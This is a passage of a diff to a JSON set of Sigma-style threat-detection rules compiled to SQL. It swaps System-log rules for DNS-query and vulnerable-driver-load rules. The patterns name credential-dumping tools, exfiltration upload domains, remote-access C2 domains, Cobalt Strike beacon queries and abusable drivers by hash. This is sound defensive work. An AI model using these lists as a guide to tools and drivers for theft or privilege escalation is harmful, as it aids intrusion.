"win_system_apt_stonedrill.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE 
'%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": 
"d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects 
the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], 
"falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control 
Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ 
"attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' 